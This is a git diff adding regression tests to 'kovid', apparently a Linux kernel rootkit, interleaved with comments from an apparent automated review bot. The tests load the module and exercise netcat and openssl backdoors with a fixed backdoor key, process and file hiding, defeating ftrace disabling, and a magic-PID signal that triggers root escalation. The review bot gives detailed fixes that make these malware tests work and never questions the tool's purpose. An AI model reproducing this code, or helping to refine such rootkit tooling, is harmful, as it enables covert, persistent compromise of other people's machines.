diff --git a/Makefile b/Makefile index aa480d3..1bfdb45 100644 --- a/Makefile +++ b/Makefile @@ -16,15 +16,17 @@ UUIDGEN := $(shell uuidgen) ifndef TEST_ENV BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') +PRCTIMEOUT := 1200 else BDKEY=0x7d3b1cb572f16425 UNHIDEKEY=0x2 +PRCTIMEOUT := 120 endif # PROCNAME, /proc/ interface. COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \ - -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200 \ - -DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=1200 \ + -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK \ + -DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=$(PRCTIMEOUT) \ -DUUIDGEN=\"$(UUIDGEN)\" -DJOURNALCTL=\"$(JOURNALCTL)\" EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS} diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index 7aa48b8..2cbada8 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md 
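Review bot: `-DCPUHACK` is still emitted twice in the rewritten COMPILER_OPTIONS (once on the `-DMODNAME` continuation line and again on the `-DPROCNAME_MAXLEN` line), so the cleanup that removed the duplicated `-DPRCTIMEOUT=1200` leaves the other duplicate in place; dropping one gives `-DPROCNAME_MAXLEN=256 -DPRCTIMEOUT=$(PRCTIMEOUT) \`. The TEST_ENV branch still pins `BDKEY=0x7d3b1cb572f16425`, and the new test files in this commit repeat that value as a bare literal, so the two can drift without any build error; a one-line comment on that assignment, `# fixed key under TEST_ENV; test/native/*.test pass it to bdclient.sh verbatim`, would make the coupling visible. The new `PRCTIMEOUT` values themselves are undocumented — a short comment that the deploy branch keeps the /proc interface for 1200 s and the test branch for 120 s (so proc-timeout.test can finish) would explain why the numbers differ.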
@@ -296,18 +296,24 @@ Here are information about testing of the features available. NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should contain `# REQUIRES: DEPLOY_ONLY` marker. -| Feature | Tested | Regression Test | -| :--------------------------------------------------| :------------------------------| :------------------------------------ | -| No tainted messages/log appear in DEPLOY | Yes | cross/no-kovid-logs-in-deploy.test | -| kovid (DEPLOY) doesn't appear in /var /sys etc. | Yes | cross/no-kovid-found.test | -| Hide/Unhide Module Test in DEBUG Mode | Yes | cross/hide-unhide-module.test | -| Hide nc process | Yes | complex/nc-hide-pid{_host}.test | -| nc backdoor | Yes | native/nc-backdoor.test | -| openssl backdoor | Yes | native/openssl-backdoor.test | -| tty backdoor | Yes | native/tty-backdoor.test | -| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | -| Hide/Unhide Module | Yes | native/hide-unhide-module.test | -| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | -| hide file | Yes | native/hiden-file.test | -| hide file (2) | Yes | native/hiden-file-in-all-dirs.test | -| unhide module | Yes | native/hide-unhide-module.test | +| Feature | Tested | Regression Test | +| :--------------------------------------------------| :------------------------------| :------------------------------------------------------| +| No tainted messages/log appear in DEPLOY | Yes | cross/no-kovid-logs-in-deploy.test | +| kovid (DEPLOY) doesn't appear in /var /sys etc. 
| Yes | cross/no-kovid-found.test | +| Hide/Unhide Module Test in DEBUG Mode | Yes | cross/hide-unhide-module.test | +| Hide nc process | Yes | complex/nc-hide-pid{_host}.test | +| nc backdoor | Yes | native/nc-backdoor.test | +| openssl backdoor | Yes | native/openssl-backdoor.test | +| tty backdoor | Yes | native/tty-backdoor.test | +| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | +| Hide/Unhide Module | Yes | native/hide-unhide-module.test | +| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | +| hide file | Yes | native/hiden-file.test | +| hide file (2) | Yes | native/hiden-file-in-all-dirs.test | +| unhide module | Yes | native/hide-unhide-module.test | +| procfile timeout | Yes | native/proc-timeout.test | +| Ftrace | Yes | native/ftrace-disable-enable.test | +| Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test | +| bdclient.sh test | Yes | native/nc-backdoor-bdclient.test | +| bdclient.sh GIFT | Yes | test/native/gift-bdclient.test | +| Kaudit | Yes | test/native/kaudit.test | diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test new file mode 100644 index 0000000..dd4d9bf --- /dev/null +++ b/test/native/ftrace-disable-enable.test 
@@ -0,0 +1,66 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+sudo insmod ../../../build/kovid.ko
+
+# Check initial value of ftrace_enabled
+INITIAL_VALUE=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Initial value of ftrace_enabled: $INITIAL_VALUE"
+
+# Attempt to disable ftrace by writing 0 to ftrace_enabled
+echo 0 > /proc/sys/kernel/ftrace_enabled
+READ_VALUE=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing 0: $READ_VALUE"
+
+# Verify kovid functionality using list-hidden-tasks
+sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
+echo list-hidden-tasks > /proc/myprocname
+echo "Kovid functionality with ftrace_enabled=0 is working."
+
+# Attempt another ftrace write with a different value (e.g., 2)
+echo 2 > /proc/sys/kernel/ftrace_enabled
+READ_VALUE2=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing 2: $READ_VALUE2"
+
+
+# Verify kovid functionality again using list-hidden-tasks
+echo list-hidden-tasks > /proc/myprocname
+echo "Kovid functionality with ftrace_enabled=2 is working."
+
+# Test echo with invalid values
+echo -1 > /proc/sys/kernel/ftrace_enabled
+READ_INVALID=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing -1: $READ_INVALID"
+
+# Cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Initial value of ftrace_enabled: 1
+# CHECK: Value of ftrace_enabled after writing 0: 1
+# CHECK: Kovid functionality with ftrace_enabled=0 is working.
+# CHECK: Value of ftrace_enabled after writing 2: 1
+# CHECK: Kovid functionality with ftrace_enabled=2 is working.
+# CHECK: Value of ftrace_enabled after writing -1: 1
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
+# CHECK: Got event
+# CHECK: unloaded
+
+# FIXME: It should print
+# Value of ftrace_enabled after writing 2: 1
+# Value of ftrace_enabled after writing 0: 0
+# etc.
+# I have tried manually, as root, and it works.
+# I am not sure why `sudo su` did not make difference here.
diff --git a/test/native/gift-bdclient.test b/test/native/gift-bdclient.test
new file mode 100644
index 0000000..e9bbb0a
--- /dev/null
+++ b/test/native/gift-bdclient.test
@@ -0,0 +1,47 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Test parameters
+REMOTE_IP="127.0.0.1" # Use localhost for the remote IP
+REMOTE_PORT="9999"
+BACKDOOR_KEY="0x7d3b1cb572f16425"
+GIFT_IP="127.0.0.1" # Use localhost for GIFT
+
+# Test connection without GIFT
+echo "Testing connection without GIFT..."
+if GIFT="" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then
+ echo "Connection without GIFT succeeded."
+else
+ echo "ERROR: Connection without GIFT failed."
+fi
+
+# Test connection with GIFT
+echo "Testing connection with GIFT..."
+if GIFT="$GIFT_IP" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then
+ echo "Connection with GIFT succeeded."
+else
+ echo "ERROR: Connection with GIFT failed."
+fi
+
+# Cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection without GIFT succeeded.
+# CHECK: Connection with GIFT succeeded.
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: unloaded
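Review bot: The sysctl writes `echo 0 > /proc/sys/kernel/ftrace_enabled`, `echo 2 > …` and `echo -1 > …` are performed by the test's own shell, which is unprivileged (every privileged step in this file goes through `sudo`), so unless the harness itself runs as root the redirect fails with EACCES, the error goes to the uncaptured stderr (`> %t.log` takes stdout only) and the value stays 1 no matter what the module does; the CHECKs expecting `1` after writing 0 therefore pass whether or not kovid intercepts the write, which is exactly what the trailing FIXME is observing. Make the write reach the kernel with `echo 0 | sudo tee /proc/sys/kernel/ftrace_enabled >/dev/null` (same for 2 and -1), then decide what the expected readback is and delete the FIXME. `echo list-hidden-tasks > /proc/myprocname` has the same unprivileged-redirect problem. The two `echo "Kovid functionality … is working."` lines are printed unconditionally, so the CHECKs that match them assert nothing; either gate them on the exit status of the preceding command or drop them from the CHECK list.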
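Review bot: `GIFT="" sudo …` and `GIFT="$GIFT_IP" sudo …` place the variable in sudo's environment, and with sudo's default env_reset it is not forwarded to bdclient.sh, so unless the sudoers policy on the test host whitelists GIFT both invocations run the no-GIFT path and the second CHECK does not exercise the GIFT feature at all. Move the assignment to the command side, `sudo GIFT="$GIFT_IP" ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"` (or `sudo --preserve-env=GIFT …`). Neither bdclient call has the `timeout` wrapper the nc tests in this commit use, so a hung openssl session stalls the whole run; `sudo timeout 10 …` keeps it bounded. A comment on `GIFT_IP` saying what the GIFT variable means to bdclient.sh would help, since nothing in this file explains it.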
diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test
index 13ceff5..96db504 100644
--- a/test/native/hide-unhide-module.test
+++ b/test/native/hide-unhide-module.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
 
diff --git a/test/native/kaudit.test b/test/native/kaudit.test
new file mode 100644
index 0000000..9e2e37d
--- /dev/null
+++ b/test/native/kaudit.test
@@ -0,0 +1,19 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+sudo insmod ../../../build/kovid.ko
+kill -CONT 999
+su
+exit
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: loaded.
+# CHECK: Cool! Now try 'su'
+# CHECK: Uninstalling: 'sys_exit_group' syscall=1
+# CHECK: unloaded.
diff --git a/test/native/nc-backdoor-bdclient.test b/test/native/nc-backdoor-bdclient.test
new file mode 100644
index 0000000..f6ce207
--- /dev/null
+++ b/test/native/nc-backdoor-bdclient.test
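Review bot: The `su` / `exit` pair in kaudit.test does not do what the CHECKs assume: `su` is run non-interactively with no command, so it either fails for want of a terminal or password or starts a shell that reads the harness's stdin, and in every case the `exit` on the next line is executed by the test script's own bash, not by the su shell — `sudo rmmod kovid` and `sudo dmesg` are never reached, the module stays loaded for the following tests, and the `Uninstalling: 'sys_exit_group'` / `unloaded.` checks cannot match from this run. Replace the pair with one non-interactive probe whose result lands in the log, e.g. `su -c 'id -u' </dev/null || echo "su did not grant a shell"`, and add a `# CHECK:` for the uid you expect after the hook fires. `kill -CONT 999` signals whatever process holds PID 999 on the host; a comment such as `# 999 is the module's magic trigger PID, not a real process` would tell the next reader that this is intentional. This is also the only new test in the commit without `# REQUIRES: 0`; worth confirming that is deliberate.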
@@ -0,0 +1,48 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s &> %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Define the number of connection attempts
+NUM_ATTEMPTS=5
+SUCCESS_COUNT=0
+FAIL_COUNT=0
+
+# Automate bdclient.sh for repeated connection and disconnection
+for i in $(seq 1 $NUM_ATTEMPTS); do
+ echo "Attempt $i: Establishing connection..."
+ if sudo timeout 5 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+ echo "Connection attempt $i succeeded."
+ SUCCESS_COUNT=$((SUCCESS_COUNT + 1))
+ else
+ echo "Connection attempt $i failed."
+ FAIL_COUNT=$((FAIL_COUNT + 1))
+ fi
+ # Wait briefly between attempts
+ sleep 1
+done
+
+# Remove the kernel module and cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: Got event
+# CHECK: unloaded
diff --git a/test/native/nc-backdoor-remove-and-install-nc-tool.test b/test/native/nc-backdoor-remove-and-install-nc-tool.test
new file mode 100644
index 0000000..4c02b80
--- /dev/null
+++ b/test/native/nc-backdoor-remove-and-install-nc-tool.test
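Review bot: SUCCESS_COUNT and FAIL_COUNT are maintained in the loop but never printed or checked, so the five connections are only evidenced by the `Connection received on` banner, which matches whether or not bdclient ever exited cleanly. Print the totals after the loop, `echo "Succeeded: $SUCCESS_COUNT, failed: $FAIL_COUNT"`, and pin them with `# CHECK: Succeeded: 5, failed: 0` — bearing in mind that `timeout 5` ends bdclient with status 124, so if the client normally stays attached until killed the honest expectation is 0/5 and the CHECK should say that rather than leave the counters decorative. The key `0x7d3b1cb572f16425` is the Makefile's TEST_ENV `BDKEY` repeated as a literal; hoisting it into a `BACKDOOR_KEY=` variable at the top, as gift-bdclient.test does, documents where it comes from.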
@@ -0,0 +1,50 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Prepare system by removing netcat (simulating backdoor tool removal)
+echo "Removing netcat..."
+sudo mv /usr/bin/nc /usr/bin/nc2 || echo "Netcat already removed."
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Attempt to establish a connection without netcat
+echo "Testing connection without netcat..."
+if ! sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+ echo "Connection failed as expected without netcat."
+else
+ echo "ERROR: Connection unexpectedly succeeded without netcat."
+fi
+
+# Restore netcat (simulating backdoor tool installation)
+echo "Restoring netcat..."
+sudo mv /usr/bin/nc2 /usr/bin/nc || echo "Netcat already restored."
+
+# Attempt to establish a connection with netcat restored
+echo "Testing connection with netcat restored..."
+if sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+ echo "Connection succeeded as expected with netcat restored."
+else
+ echo "ERROR: Connection unexpectedly failed with netcat restored."
+fi
+
+# Remove the kernel module and cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection failed as expected without netcat.
+# CHECK: /bin/sh: 0: can't access tty; job control turned off
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: Got event
+# CHECK: unloaded
diff --git a/test/native/proc-timeout.test b/test/native/proc-timeout.test
new file mode 100644
index 0000000..a1f80fc
--- /dev/null
+++ b/test/native/proc-timeout.test
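Review bot: `sudo mv /usr/bin/nc /usr/bin/nc2` mutates the host and the restoring `mv` only runs if the script gets that far; if the harness kills the test (the 10-second `timeout`s do not bound `insmod` or a stuck sudo prompt) or anything in between aborts, the machine is left without `nc` and every later netcat test in the suite fails for an unrelated reason. Register the cleanup before the first `mv`, `trap 'sudo mv /usr/bin/nc2 /usr/bin/nc 2>/dev/null; sudo rmmod kovid 2>/dev/null' EXIT`, and keep the inline restore as a no-op. Two smaller points: `/usr/bin/nc` is frequently an alternatives symlink, so the move relocates the link rather than the binary (still effective, but worth a comment), and the `# CHECK: /bin/sh: 0: can't access tty` line expects a shell diagnostic that is normally written to stderr while this file redirects stdout only (`> %t.log`), unlike the `&>` in nc-backdoor-bdclient.test — unless bdclient relays it on stdout, that CHECK cannot match.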
@@ -0,0 +1,16 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sleep 10
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+sleep 140
+sudo dmesg
+sudo rmmod kovid
+
+# CHECK: /proc/myprocname loaded, timeout: 120s
+# CHECK: /proc/myprocname unloaded.
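Review bot: This test never clears the kernel ring buffer before loading the module — every other test in this commit starts with `sudo dmesg -c` — so `/proc/myprocname loaded, timeout: 120s` and `unloaded.` left behind by an earlier test satisfy both CHECKs even if this run's proc file never times out; add `sudo dmesg -c` before `sudo insmod`. The `sleep 140` and the `120s` literal are hard-coded copies of the `PRCTIMEOUT := 120` that the same commit introduces in the Makefile's TEST_ENV branch, so a later change to that value silently breaks or slows this test; a comment on the sleep, `# must exceed PRCTIMEOUT (120 s in TEST_ENV builds)`, at least ties them together. As with kaudit.test, `kill -CONT 31337` delivers SIGCONT to whatever process owns that PID on the host, so a one-line comment that 31337 is the module's magic trigger and not a real process is worth adding.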